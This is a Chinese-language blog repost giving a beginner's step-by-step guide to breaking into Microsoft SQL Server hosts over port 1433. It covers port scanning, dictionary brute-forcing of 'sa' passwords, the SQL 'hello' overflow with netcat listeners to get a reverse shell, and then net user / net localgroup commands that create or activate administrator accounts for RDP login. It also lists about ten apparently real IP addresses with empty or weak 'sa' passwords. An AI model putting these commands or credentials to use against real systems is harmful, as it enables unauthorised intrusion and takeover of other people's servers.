【轉】1433埠入侵詳解

ljm0211發表於2012-07-02

scanport.exe 查有1433的機器

  SQLScanPass.exe 進行字典暴破(字典是關鍵)

  最後 SQLTools.exe入侵

  對sql的sp2及以下的系統,可用sql的hello 溢位漏洞入侵。

  nc -vv -l -p 本機埠 sqlhelloF.exe 入侵ip 1433 本機ip 本機埠

  (以上反向的,測試成功)

  sqlhelloz.exe 入侵ip 1433 (這個是正向連線)


久違的溢位工具

  用X-Scan對該站點的Server掃描結果出來了,開的埠還不少呢:53、80、1433、3389。可並沒有報告說發現有弱口令,看來網管還算比較有責任心。但開了3389埠,意味著可以遠端登入,這可是微軟給所有Windows使用者獻上的最大的“木馬”。

  透過觀察,我發現只有在1433埠上下點工夫,想想辦法。何不用SQL2溢位工具試試?

  先開一個cmd視窗,祭出寶刀netcat,在命令提示符下敲入“netcat -l -p 99”,監聽本地99埠。接著該SQL2出馬了。再開啟一個cmd視窗,鍵入“sql2 218.147.*.* 61.157.*.* 0”,其中218.147.*.*是對方IP,61.157.*.*是我自己的IP,回車後提示package sent successful。再回過頭去看看監聽本地埠的netcat,已經變成了C:\WinNT\system32\_,這就是對方機器的系統資料夾了, 看來是成功溢位了,就這麼簡單。

  我很幸運地得到了對方的一個Shell,而且還是administrator許可權的。接下來的操作就輕車熟路了,新增使用者,提升許可權:在提示符 下鍵入“net user hacker 12345 /add”(在對方機器裡建立一個名為hacker,密碼為12345的使用者),再鍵入“net localgroup administrators hacker /add”(把使用者hacker加入到管理員組),接下來就該是3389遠端登入了。

首先執行Windows XP自帶遠端登入器mstsc.exe,填入對方的IP地址218.147.*.*,確定後在登入介面填上我剛建立的使用者名稱hacker和密碼12345,順利地進入了對方的Windows 2000桌面。


218.5.135.66     SQL-Server弱口令: "sa/1234"
218.14.115.111   SQL-Server弱口令: "sa/[空口令]"
218.12.38.52     SQL-Server弱口令: "sa/[空口令]"
218.12.97.14     SQL-Server弱口令: "sa/[空口令]"
218.6.242.228    SQL-Server弱口令: "sa/[空口令]"
222.100.119.3    SQL-Server弱口令: "sa/[空口令]"
222.105.67.200   SQL-Server弱口令: "sa/[空口令]"
222.105.28.130   SQL-Server弱口令: "sa/[空口令]"
222.106.60.51    SQL-Server弱口令: "sa/[空口令]"
222.117.107.1    SQL-Server弱口令: "sa/[空口令]"

在win2000機器上裝了mssql的話,機器就會開1433埠。什麼 什麼是埠?就象食堂買菜的視窗一樣,你買白菜上1號窗,買蕃茄上2號窗。在機器上買mssql就上1433埠。溢位1433需要兩個工具 nc.exe和sql2.exe。進攻方法就兩步,在自己機器上開一個cmd視窗。對了,你要用win2000的話就在開始-執行-鍵入cmd回車就成了 餓。這裡我們只用2000不說98。如果你把你的下的nc.exe和sql2.exe放在C:盤的話,就在你開的這個視窗打入命令c:>nc -1 -p 40回車。這步的意思是用nc這個工具開一個40的埠監聽。第二步:再在開始-執行-鍵入cmd灰塵,再開個視窗。在這個視窗寫入命令c:> sql2.exe你要入侵網站的ip和你自己的ip 40 0回車。這裡要作點說明:如何得到入侵網站的ip?在cmd下c:>ping 網址,就行了。自己的ip就不用我說了吧?算了還是說下吧,在cmd下鍵入ipconfig就可以了。其中命令列中的40你可以隨便改成別的,但好象40 和53的成功率高一點。再是命令中的0不性的話,你就試試1或2。如果入侵網站有這個漏洞的話,那麼你開的第一個視窗就會邊成肉雞的c:>winnt\ system32>.就是說,你已經進入它的機器裡了。進去以後,你可以新增個擁護了。net user guest /active:yes用這個命令,就將預設禁止的guest擁護激火。net user guest 123456這樣guest的密碼變成了123456了。net localgroup administrators guest /add這就是guest成為最高許可權的管理員了。

呵呵,基本就是這樣了,,,,

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/11411056/viewspace-734406/,如需轉載,請註明出處,否則將追究法律責任。

相關文章